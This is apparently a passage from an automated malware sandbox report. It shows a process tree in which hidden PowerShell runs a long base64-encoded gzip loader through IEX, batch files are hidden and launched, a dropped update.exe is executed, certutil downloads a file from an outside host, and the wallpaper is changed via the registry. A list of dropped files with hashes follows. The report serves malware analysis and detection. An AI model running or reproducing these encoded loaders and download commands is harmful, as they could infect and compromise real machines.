gBNAGgAWgBFAG8AcQBNAEoAcQBSAFYANgBPAE4ARgAwAEoALwBrAGUAWgAzADkAaAA4AFUAUABLADkAdABRAHIAMwBWAEcANgBnAHkAVQBNAEQAeQArAGEAdQByAGEAbgA3AHYAdgA2ADAAOABYAHEAWgBQADUAegA3AHQANwBmADMAYQBTAE0ARQBhAGMANQB2AFgAcgBtAEkAbAAwAGQAOQBWAHIATQArAGEASAAwAFUAUABvADUAMQB1AFEAeQBXAEQAQgB1AFoAOAAvAFEAaABlAEsASgB6AGEAawBLAGwAbgA1AFIAcQBWAHkAcwBlAGQAOAB3AHMATwBYAFcAeABEAFYAdwBsADkANQA3AGwAbwBzADcAYgB0AG0AWABuAGoAOQBFAGsASABBADIAMwBjAHMAYgBsADYAZwBzAHQAcABDAFUATwBtACsAZQBHAG8AUwByADAASgBRAHIAZAAwAFAASgBNAFIAYgB6AFoARgBjADMARQA2ADQAYgBuAEgATwBnAHQAKwArAGIASwBHADQAOQBYAGUAZwBTAGgAagBkADAAdAAyAE4AWQBwAE8ARwBaAHEAbQA4ADIAZQBMAHIAcABaACsASAB4AGIATwA4ADcAUABLAG0ANwBsAGEAMwBsAHkAOQA4ACsAVAA5AFQAbgBhAHgAVQAvAFcARQBmAGgAaQA3AEQAdgA0AC8AQgB1AEMAbgBUAGYAOAA3AHQARABsADQAUgBYAC8AMgBCAGwAMwBoADAATQBkADQAVgBVAHYAbABiADYAVwBTAHQASwBIAGUAegBVAGYAVwBLADMAeAA5ADQASQBEAHEARgB0AHkATABnAE8AYgBrAGUAdQA4AFoAOABLAGwAUwAzAEwAMgBWAFMANwAxAEsAUwBmAHcAOQBkAGEAbABUAFAANgBoAHIATwBCADQAYgBNAFUAMwA0AFgAZwBtADMAYwBYADQAUgBVADgAZgBQAHIAKwAvAFUAUQBiAGUATwBpAHQAKwBwAE8AVABZAHgAdABNAC8AWABRADgAOABBAGwAbQBMAG8AcAAzAEwAVABoAFoARgBjAEcATwBiACsAQgByADAAbQB5AHgAegBQAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3348
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c attrib +h winbata.bat
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3052
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h winbata.bat
            3⤵
            • Views/modifies file attributes
            PID:4076
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c start winbata.bat
          2⤵
            PID:3160
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /K winbata.bat
              3⤵
                PID:3656
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB4AEIATQBXAHIAMgAxAEYAWQB0AEkAaQBBAEsAdgBxAEcAWQBtAEoATgBLAEEAVABNAHEAaABuAGMARwBoAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAyAGUAVABlAHIAYgByAFgASwBvAHQAaABwAHIAdQBuADUAKwBtAG4AZQB4AG8AVgBrADIAdQBWAGgASgBaAEoARgBBADkAaAA2AGwAcgBEAFkAVwBSADUATAB0AFUAcwBsAFMANwA3AG4AawBTAG8AcgA5AFMAMwBjAG0AawBUAHUAeQBiAEoAcAAvAFAAQgA4AHgAYQBUAFoAegAvADAAegBHAGMAZABvAFIAQgBIAEUAZgBWAFgANgBXAEsAcQBoADcAcABEAFYAUwA0AFQAUABYAHgAMgBQAEIAVABiAHUARQBZAFYATAA3AGsAZwBSAG4ARwBJAHEAeABjAFgAcABZAHQAaQBLAG4AWQBqAGYAWQBPAGYAWABaADEAWQBDAFgANQAyAE0ATgBsADUASwBJAEsATgBLAG8AKwBzADcALwBjADkAUgA3AGYAYwBwAHkAOQBmAHUARABnAE0AcwBVAHUATwA3ADMAVQBSAEUAegBhAEsAcwBHAFAAWQBGAG8ANABxAFYAZQBvADcAdABkAHIAaABFAEYAOQBQAGoARAAwADIAQwBmAFUAWABkAGYAbABjAEYAMgAzAFAAMABPADIAVABXAE0AYgBwADUAZwA0AE8AeABMAG8AbwBYADUATQA5AFUAOAA5AFAAVQBGAGQAOQAyAHkASwBWADgAcAA5AC8AbABxAHUAUAAxADQAMgBuAE8AaAAvAEUAdQBoADEAVgB5AG0AbwBXAEUAZQB6AFUAawBXADIAWABxADkAUwBQAGEAcgA3AGgASQB2AE4AeABwAGEAeABZAFoAdQBoAEYAMwBvAGIAVQBWADUAYgBMAE4ATwB2AEwAdwB2AHQAeAA0AGIAeAB5ADkATAAxAGMAUABaADEAcwA2ACsAdAB3AGoAcwA4AFAAbQBWAHMAOQA2AGwAVABLAE0ASgB3AEMATgB1AHcAUgB3ADMASwBOAGUAcwB6ADMAZQAzAHgANgBvAHIANgA5AGUAVABPAFAAWABXAEkANQB1AEMANgA1AEIASQBlAGUAcgArAEkAdwBzAFUAdwBjADEAUQBlADYAaQAyAHcAOAB4AHgAdABRAEsAMABjAFEAUABuAGQAYgByAG8ASQBUAEkAUwBaAHgANgBGAEoAbgBYADAAQQB2ADgAVgA1AHcANQBkAEsATgBiAGIAcwBHAGQAaAA5AC8AMQArADUAVABaAFkAdwBQAFoAMwBCAC8AVgA2AG4AeQBYAGcAbQBrAHAAaQBTAHMAMQBrADYAYwArAEIAMAA0AGwASQBJADMAUgAzAE4AdwBuAEYAKwA4AGYAMABlAHUASwB2AHgAKwBJAFYAaQAxADkASwBQADAAQQBWAFUAUgB0AHYARgBXAEoALwBpAFoAQQBMADcAdgB1AEYAcQA2AHUASABnAHMAaABoAGoATwBVADUAbAA2AGsAVgBYAG8AZgBhAFgAbwBHAHEAVwBBAEUAegByAHgAdwBpAHcAUAA1AHkASwBNAGMAZgBYAHAAbgAvAGcAYwB0AHoAMQByAFIAcgBWAFAARABUAFgATwBXAGkAZQBkAFkAMwBpAE8AZgBuAHkAbABIAGoAWABQAFEAawArAGwAaQAyAHIAcAB4AEoANQA4AC8AdABtAEkATABSAHYAaABNAEYALwAvAFAAQgB2ADYAZQBHAE8ANQB1AEoAKwA1AHUAbQBPAFoAWgA4AEoAWABQAG8AbwBaADMAdABpADQAdwBLAE4AKwBGAGgAdQBEAG4ANQBYAHkAYQBRAEcAagAvAGcAbQBkAGMAZwA3AG8ANAA2ADkAcQB2AEcATwBSAE4AOQAzAGUAMABUAG4AVwBoAEwAaABIADQAQgBWAFEAbwB2AHEAegBNADgAYwBZAFYAcwBxAFMAcQAyAEEASAA4AEQAdQArAEEAMAAwAHYATgA1AEIAbQArAEMAeAA5AFMAcQAzAHMAdgBIAHYAKwBuAG4ATwBaAHMALwBVAG8AcQBsAEgAVABHAFAATABjAHIARgBFAHEAMQBtADIATQBhAGgAVAByAFIAdABaAHAAaQBZADIASgBWAHcAegBMAC8ANwBpAHIAeABEAGEAeABUAEQAMABpAFoAMwBOAFAAMQBRADgAZwBQAFcAMwBOAGUAUwA1AGsAVABHAHgAQwBkAEEARwBHAGgAZQBwAGoAMAA5AEwAdABIAEoAVQBhAE4AYgBBAFEANwBtAFcAcQB0AFQAMgA3AFUAUAA0AFEARQAwADYAMwBiAFUAZwA1AHMASgBSAEEAVABHAEEAbQB4ADAASQBsAE8AVwBkAEMAVgBQAHMAMwBQADYAcAAxAEYAUgBQAEoAOABXADMAcwBnAEgAUgBSAGgAUQBSAGIAMwAwAEwATgBPAFcAVgBVAFEAVABkADkAaQAxAEgANQBQADcAaAA5AHoAcABOAGoAVQB1AFIAWQBuAFUARgA2ADUAegBRAFEAUQBMAFUAOQBVAHEATQAwAEsAeQBSAFEAMQA4AHEAMQBYADQAagAzAHYANwBuADMAYwA0AG4ANQB5AFUAMAB1AHgASwBkAEEAVgBvAHAARQBmAE8AeABsAEoARQArAFgAUQB0AEwATQBMADUAZQB2AGIAMQBnAFcAeQBJAFUARQBVAEIATgBDAHoAKwBuAHAARQBXADYAMwAxAEsASwBNAFYAYwBwAE0ATgB3ADYAawBUAE4AbgBQADIAcQBIAEkASgA4AEkAZwBHAFAAQQBMACsAQwBmAHcAWgB3AEsAQgBsACsAWABoADMATwAvAE4AWgBaAE8AUABKADkATQBCAFAAZAB4AEkAcwAyADYALwBGAFIAOQBpAEsAVgA3ADAAYQBFAGEAZwBRAGUANAAxAEUAUABtAE4AbABFAHkAOABoADAAYgBzAHQAQgByAEkAbAA1AEkAeAB6AEUAVwBkAFkAQgBEADEAcABhAFQAUABEAHAAcQBCAEoANwBTADMAMQB0ADMASgB6AGwARgAvAFoAaAB3AGEAeAByADAAawBkAEEAeABSAGEAQQAyADAAUwBNAGoAbABCADEATABTAEUAdwBMAHUAegBvAFAAeABqAFoAUgB3ADMAaABEADAAdQBtADMAZgA3AFIAMQBRAEMALwBQAEQATgByADYAWAB6AFEATgBEAHUAbABqAGYAcAB0AGwASQB1ADEATABwAGgAcQBoAGwAWQAxAG4AagAvAGIASABxAEkAdABsAG8AegBJAFQAaAArAEwAWABKAGsANQBSAEcAZwB6AG0ATgArAEcAaQBOAHQASQBCAG4AcABzAGIASQBoADMATgBLAHoARgBaAHQAdQA4AE4ATQBWAFgAdQBaACsAVQBKAHUARgBFAHYAWgBtADQATwB4AGoARQBaAEIAOQB4AGEAOQBOAGoATgBoADMAQQBJAGMAVQBqAFYAVABkAGcAOQB0AGwASgByADMAdwBzAEcAOABIADgAdgBaADQARwBFAHMAZwB0ADAAZwBYAG0AMQBiAEEAMABWAGwAdwBMAGEASwAwAGcATgBhAFIAcABQAGgAZwBqAHcAdwBVADkAMQBwAFoAWgBuAGIANABxAFMAOQBsAE0AcQBtAFQANwBUADcAWQBUAHYAVQBNADgANgBYAEwAVwB6ADAATgBpAFQAWABIAGMAcgByADcAZgBDAE8ASgAwAGYALwBWAEgAVwBlAEkAYgBCAHQARAB4AGIAOQBFAGQAaAAyAE8AVQBXAEIAVwBPAGkAMwBBAGwANgBDAHoAQwBpAHkAdwBGAFkAMwBEAEMAVAB3AE0AVwB2AHYAVABXAFoAOABVAEYAYgBwAHoATgBDAHMAYQBUAE4ATAByAEsARABmAGIATgAvAGUAYQBMADUAKwB2ACsASgBrAFkAWgAxAHkANABVAFQAdQBjAEwATgBPAHgATwAyAHkAeQBKAEkAOQBqAGsAaQBIAGMARABEAGMATwBIAFoAbgB4AFUAMwBsAGQATwBIAFkAMwBaADQAVQBXAHEAcwBYADIAKwBtAHYAYgAxAC8AMgBLADkAegBYAGsAdwBZAGEATAA1AG0AbQBsAGkANwBEAEoAQgB3AGwAZABNAHYAZQB6AGcAeAB2ADQAawB2AE0AZQBqAGEAMwArAGMAbgBEAHkAMQB4AGMAYQBPAGEAYQBiAGQANABxAHEANgBVAC8AWABkAEMAUwBJAGgAegBvAEIAWABzAGcANwBJAEsALwBYAGMAeABzAE4ASgBvAHQANwAwAFMAUgBIAGMAZQBtADYARAB0AHMARwBvADMANQBkAE4AdABIAEUASQA4ADUAbgBTADYAWAA3AEoAZwBnAGMATABzAC8AbAB4ADUAWQBCAHMAMwBWAEYANQBUAGIASwAyAHkAQQB6AGcANAB4AHcAbwBIAGYAOABTAHQAaAB4ADIAdQBjADEAZgBLAGwAMQA1AGUAMgBaAE4AQwBRAEgAUwAwAHkANAAxAG8ASwBnADcAbQBHADkAaQBwAHIAMAA4ADYASwBOAG0ALwBDADQAVQBKADYATgBZAFkAeABjADYAZAB3AFYAbgBaAFAAYgA2AFUAWQBUADYANwBNADIAdwAxAC8AVwBQAFMARAB4AE4AVABaAEgAdQBQAFAARwBWAHMATwBBAHoAegBiADkAdQA0AEcAcQBDAFgARwBsAG8AZwBjAGUAVABWAHEAWgA2ADQAOABlAFIARgBhAG4AQwBKAHMAKwBuAHgAagBsAE0AdwBTAFQAUQB3AFEAaQArAFMAcgBTAE8AeQB1ADUAbQA3AFEANgBTAGoATABuAHQAMQAyAGwAYgB1AE8ANQAyAHUAagBYAGsAYgBIADMAaABxAE4AZQBnAGMAbAAzAHMANwBFAGoAZAAvAHQAYgBnAC8ASgByAG4ASABEACsAQQBzAEYARAAzAGYARwBnAEoANwBpAEIAcgBNAEkANwBtAFkAUAA1AHIAMABrAHQAZwBWAHAAdgAxAHIAMABHAG0AMgBhADQAQwBCAGkAdABHADEAOABrADEAcQBxAE0AbABxAHoAaQA5ADEAOABPAFoAbQBrADMARwBMAGQAYQBNAHEANwBoADEAawA0AEcAagBVAG0AQgA3AHYAUAAzAEsARABrAC8AawBIADAAVwBUAEcAOQA1AFIAZwBuAGQAbgBhAHgAWQBqAE4AdABmADAARABiAHQAQwB3AHAAUgBzACsANgBHAHIASgBwAG8AUABlAEUAMwBmAEIAbQAzAFQAYQB0AHMAVQB6AGYANgBqADAARQBQAEYAVgBYAFkAMQBsADYAQgBUADcAVAAwAFYANQBxAEsAbgB2AEUAawA4ADYATwA2AFkAdgBBAHcANABNAEQAZgBBAEUAZQBXAFYAZgB1ADgAQgBCAEUAdwBOAE4ATQA2AFUAdgBaAE8ATwBkAHEAUwB2AFMAdwBWADMAQwAxAHMAYgBFAEQAYgBtAGEAMQBSAHMAWgBlAGkAOQBhAGQAbABoAEsAUABHAFAASgBxADgAagB0AHYARAByAEgAUwB4AEEATwB0AHcAbgBNAGgAWgBFAG8AcQBNAEoAcQBSAFYANgBPAE4ARgAwAEoALwBrAGUAWgAzADkAaAA4AFUAUABLADkAdABRAHIAMwBWAEcANgBnAHkAVQBNAEQAeQArAGEAdQByAGEAbgA3AHYAdgA2ADAAOABYAHEAWgBQADUAegA3AHQANwBmADMAYQBTAE0ARQBhAGMANQB2AFgAcgBtAEkAbAAwAGQAOQBWAHIATQArAGEASAAwAFUAUABvADUAMQB1AFEAeQBXAEQAQgB1AFoAOAAvAFEAaABlAEsASgB6AGEAawBLAGwAbgA1AFIAcQBWAHkAcwBlAGQAOAB3AHMATwBYAFcAeABEAFYAdwBsADkANQA3AGwAbwBzADcAYgB0AG0AWABuAGoAOQBFAGsASABBADIAMwBjAHMAYgBsADYAZwBzAHQAcABDAFUATwBtACsAZQBHAG8AUwByADAASgBRAHIAZAAwAFAASgBNAFIAYgB6AFoARgBjADMARQA2ADQAYgBuAEgATwBnAHQAKwArAGIASwBHADQAOQBYAGUAZwBTAGgAagBkADAAdAAyAE4AWQBwAE8ARwBaAHEAbQA4ADIAZQBMAHIAcABaACsASAB4AGIATwA4ADcAUABLAG0ANwBsAGEAMwBsAHkAOQA4ACsAVAA5AFQAbgBhAHgAVQAvAFcARQBmAGgAaQA3AEQAdgA0AC8AQgB1AEMAbgBUAGYAOAA3AHQARABsADQAUgBYAC8AMgBCAGwAMwBoADAATQBkADQAVgBVAHYAbABiADYAVwBTAHQASwBIAGUAegBVAGYAVwBLADMAeAA5ADQASQBEAHEARgB0AHkATABnAE8AYgBrAGUAdQA4AFoAOABLAGwAUwAzAEwAMgBWAFMANwAxAEsAUwBmAHcAOQBkAGEAbABUAFAANgBoAHIATwBCADQAYgBNAFUAMwA0AFgAZwBtADMAYwBYADQAUgBVADgAZgBQAHIAKwAvAFUAUQBiAGUATwBpAHQAKwBwAE8AVABZAHgAdABNAC8AWABRADgAOABBAGwAbQBMAG8AcAAzAEwAVABoAFoARgBjAEcATwBiACsAQgByADAAbQB5AHgAegBQAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1812
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c attrib +h update.exe
              2⤵
                PID:4988
                • C:\Windows\SysWOW64\attrib.exe
                  attrib +h update.exe
                  3⤵
                  • Views/modifies file attributes
                  PID:884
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c start update.exe
                2⤵
                  PID:2404
                  • C:\Users\Admin\AppData\Local\Temp\update.exe
                    update.exe
                    3⤵
                    • Executes dropped EXE
                    PID:1420
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c attrib +h windata.bat
                  2⤵
                    PID:2292
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib +h windata.bat
                      3⤵
                      • Views/modifies file attributes
                      PID:4576
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c start windata.bat
                    2⤵
                      PID:3556
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /K windata.bat
                        3⤵
                          PID:4564
                          • C:\Windows\SysWOW64\certutil.exe
                            certutil -urlcache -split -f http://art-cure.com/upload/image.jpg
                            4⤵
                              PID:232
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c attrib +h win32.bat
                          2⤵
                            PID:4400
                            • C:\Windows\SysWOW64\attrib.exe
                              attrib +h win32.bat
                              3⤵
                              • Views/modifies file attributes
                              PID:528
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c start win32.bat
                            2⤵
                              PID:2616
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /K win32.bat
                                3⤵
                                  PID:3688
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\Pictures\desktop.jpg /f
                                    4⤵
                                    • Sets desktop wallpaper using registry
                                    PID:2604
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    RUNDLL32.EXE user32.dll ,UpdatePerUserSystemParameters
                                    4⤵
                                      PID:964
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c attrib +h windata.bat
                                  2⤵
                                    PID:2304
                                    • C:\Windows\SysWOW64\attrib.exe
                                      attrib +h windata.bat
                                      3⤵
                                      • Views/modifies file attributes
                                      PID:3280
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c start windata.bat
                                    2⤵
                                      PID:5060
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /K windata.bat
                                        3⤵
                                          PID:4964
                                          • C:\Windows\SysWOW64\certutil.exe
                                            certutil -urlcache -split -f http://art-cure.com/upload/image.jpg
                                            4⤵
                                              PID:3236
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c attrib +h win32.bat
                                          2⤵
                                            PID:3228
                                            • C:\Windows\SysWOW64\attrib.exe
                                              attrib +h win32.bat
                                              3⤵
                                              • Views/modifies file attributes
                                              PID:3296
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c start win32.bat
                                            2⤵
                                              PID:2672
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /K win32.bat
                                                3⤵
                                                  PID:1784
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\Pictures\desktop.jpg /f
                                                    4⤵
                                                    • Sets desktop wallpaper using registry
                                                    PID:4920
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    RUNDLL32.EXE user32.dll ,UpdatePerUserSystemParameters
                                                    4⤵
                                                      PID:3396

                                              Network

                                              MITRE ATT&CK Enterprise v6

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F60F3B8ADC68AB66ED9F0FB14DD3868B

                                                Filesize

                                                12KB

                                                MD5

                                                0ad0c474db8f24a7c58d7b76e3b08e2e

                                                SHA1

                                                324271930e8c8c6d970fea0d8cc5f888ff3b4d5d

                                                SHA256

                                                5684a132344756d1d5feac935fd898c5a451e1895680c86510ea40bd5fa4b331

                                                SHA512

                                                920a54787d5d568ba75c349caae3f7a80739ee8c85675f2f732f763abbb4bc659fb8fe764e84687b9f892b23a473eb96375a6b3a92d8987ca48d75313160fba4

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F60F3B8ADC68AB66ED9F0FB14DD3868B

                                                Filesize

                                                12KB

                                                MD5

                                                0ad0c474db8f24a7c58d7b76e3b08e2e

                                                SHA1

                                                324271930e8c8c6d970fea0d8cc5f888ff3b4d5d

                                                SHA256

                                                5684a132344756d1d5feac935fd898c5a451e1895680c86510ea40bd5fa4b331

                                                SHA512

                                                920a54787d5d568ba75c349caae3f7a80739ee8c85675f2f732f763abbb4bc659fb8fe764e84687b9f892b23a473eb96375a6b3a92d8987ca48d75313160fba4

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F60F3B8ADC68AB66ED9F0FB14DD3868B

                                                Filesize

                                                232B

                                                MD5

                                                3440393ffeb71aee7b09916957222af1

                                                SHA1

                                                8f9d8c9b16e2e7449b3e57fe4e747c841dcfdd79

                                                SHA256

                                                b38cb729630b5d6ae7b0253c5c1c180bbb81148f50c49cf88484216e35114a3a

                                                SHA512

                                                88a7bc83463a775ae2e74a31a9b6b12022fbfa8ebdfba946539187e861b1b4bc413f9f919912866a17f082e158b9b3d09bc823866b14bc3816c17907e5cf74be

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F60F3B8ADC68AB66ED9F0FB14DD3868B

                                                Filesize

                                                232B

                                                MD5

                                                baab1b4393ca6a2bae5df661b390dd8c

                                                SHA1

                                                283c6d9f68997b86eb942d85f4532f0494fbc74d

                                                SHA256

                                                dfed613f872165e2d0c33f52cbe5b6a0aaddb908591fc45fd72d8c29e3552796

                                                SHA512

                                                0a87eda2310d5de26aaaec908515e9eb3fc8663aa4197571a7e4ef6a39750effd71b7b34ebe0800e59598baaf2d1c7641f53ca43909821efe388233c12ec2d94

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                Filesize

                                                1KB

                                                MD5

                                                4280e36a29fa31c01e4d8b2ba726a0d8

                                                SHA1

                                                c485c2c9ce0a99747b18d899b71dfa9a64dabe32

                                                SHA256

                                                e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

                                                SHA512

                                                494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                Filesize

                                                53KB

                                                MD5

                                                06ad34f9739c5159b4d92d702545bd49

                                                SHA1

                                                9152a0d4f153f3f40f7e606be75f81b582ee0c17

                                                SHA256

                                                474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

                                                SHA512

                                                c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                17KB

                                                MD5

                                                02054c23904c2a029dccf943a2e24af8

                                                SHA1

                                                cfa8c8568a0e5948187527a1ebf2c3315dd09e26

                                                SHA256

                                                6cbd3538f6ff23ffb9b0f22a96a1bc2983c4c937667be534773a9297b151b6e5

                                                SHA512

                                                880b617a95071414c9fd5e191a3d7a71a2fbb7b0c9182846f024bf1f5b99c142117ec5662befa56b34a6c34981140813e16c6d3397cc7fef15e031c9195abb83

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                17KB

                                                MD5

                                                02054c23904c2a029dccf943a2e24af8

                                                SHA1

                                                cfa8c8568a0e5948187527a1ebf2c3315dd09e26

                                                SHA256

                                                6cbd3538f6ff23ffb9b0f22a96a1bc2983c4c937667be534773a9297b151b6e5

                                                SHA512

                                                880b617a95071414c9fd5e191a3d7a71a2fbb7b0c9182846f024bf1f5b99c142117ec5662befa56b34a6c34981140813e16c6d3397cc7fef15e031c9195abb83

                                              • C:\Users\Admin\AppData\Local\Temp\image.jpg

                                                Filesize

                                                12KB

                                                MD5

                                                0ad0c474db8f24a7c58d7b76e3b08e2e

                                                SHA1

                                                324271930e8c8c6d970fea0d8cc5f888ff3b4d5d

                                                SHA256

                                                5684a132344756d1d5feac935fd898c5a451e1895680c86510ea40bd5fa4b331

                                                SHA512

                                                920a54787d5d568ba75c349caae3f7a80739ee8c85675f2f732f763abbb4bc659fb8fe764e84687b9f892b23a473eb96375a6b3a92d8987ca48d75313160fba4

                                              • C:\Users\Admin\AppData\Local\Temp\image.jpg

                                                Filesize

                                                12KB

                                                MD5

                                                0ad0c474db8f24a7c58d7b76e3b08e2e

                                                SHA1

                                                324271930e8c8c6d970fea0d8cc5f888ff3b4d5d

                                                SHA256

                                                5684a132344756d1d5feac935fd898c5a451e1895680c86510ea40bd5fa4b331

                                                SHA512

                                                920a54787d5d568ba75c349caae3f7a80739ee8c85675f2f732f763abbb4bc659fb8fe764e84687b9f892b23a473eb96375a6b3a92d8987ca48d75313160fba4

                                              • C:\Users\Admin\AppData\Local\Temp\image.jpg

                                                Filesize

                                                12KB

                                                MD5

                                                0ad0c474db8f24a7c58d7b76e3b08e2e

                                                SHA1

                                                324271930e8c8c6d970fea0d8cc5f888ff3b4d5d

                                                SHA256

                                                5684a132344756d1d5feac935fd898c5a451e1895680c86510ea40bd5fa4b331

                                                SHA512

                                                920a54787d5d568ba75c349caae3f7a80739ee8c85675f2f732f763abbb4bc659fb8fe764e84687b9f892b23a473eb96375a6b3a92d8987ca48d75313160fba4

                                              • C:\Users\Admin\AppData\Local\Temp\update.exe

                                                Filesize

                                                1.3MB

                                                MD5

                                                df1050d8af11ddc18a1cf2a2a570e249

                                                SHA1

                                                6b483d643b100ac53bef41e3570d89b210bb8b91

                                                SHA256

                                                2c98ef285579d6f9cde08e782267105c6d3d2bc86477691b2086e4bbfcbd7596

                                                SHA512

                                                8fb6759df30591826d3aa0f0dbdf0aae9350028bb26a7fccb59d3c32e873a677c333c93a89c3c33ed8a0662957af8de61d8e1c9811fe3f8f781f8aa7432ed978

                                              • C:\Users\Admin\AppData\Local\Temp\update.exe

                                                Filesize

                                                1.3MB

                                                MD5

                                                df1050d8af11ddc18a1cf2a2a570e249

                                                SHA1

                                                6b483d643b100ac53bef41e3570d89b210bb8b91

                                                SHA256

                                                2c98ef285579d6f9cde08e782267105c6d3d2bc86477691b2086e4bbfcbd7596

                                                SHA512

                                                8fb6759df30591826d3aa0f0dbdf0aae9350028bb26a7fccb59d3c32e873a677c333c93a89c3c33ed8a0662957af8de61d8e1c9811fe3f8f781f8aa7432ed978

                                              • C:\Users\Admin\AppData\Local\Temp\win32.bat

                                                Filesize

                                                378B

                                                MD5

                                                eeb34cf42496ec9dfe29025547ac9379

                                                SHA1

                                                bdac84dda44f974c09eb052e7f2377669b70d808

                                                SHA256

                                                55d2b40fca882224abd082b3ec5c9a60bc8fef5da7c422a26f33fd7c9439fd23

                                                SHA512

                                                a61c3435c8e185a128079864f6e2a214e0fbc4d1dd4734950bd58d5e3e7c0c52f11318b6065ea1aa1fbed16149e4a7b715ae3231dff414c45e0a1ba74adf7db2

                                              • C:\Users\Admin\AppData\Local\Temp\winbata.bat

                                                Filesize

                                                7KB

                                                MD5

                                                9af192d9feab7aebc7d8685f2c5b7f90

                                                SHA1

                                                7226764f5009805866f023bf8dae5377295fabf2

                                                SHA256

                                                40e4df02547d64dcd53bf7156e700f7837a480ddc7cac0c5887fdfeda990c038

                                                SHA512

                                                59a98814808b9a046a30c42a69b1f67a1b5dd94dc8018000318cd76fa488d437b01ce4f0e428c93e38d594d899d9d8db192cdb8bc793e5a18173bbb1ff238ee3

                                              • C:\Users\Admin\AppData\Local\Temp\windata.bat

                                                Filesize

                                                72B

                                                MD5

                                                7cf24b98c32a219922a5a50cd1af10b3

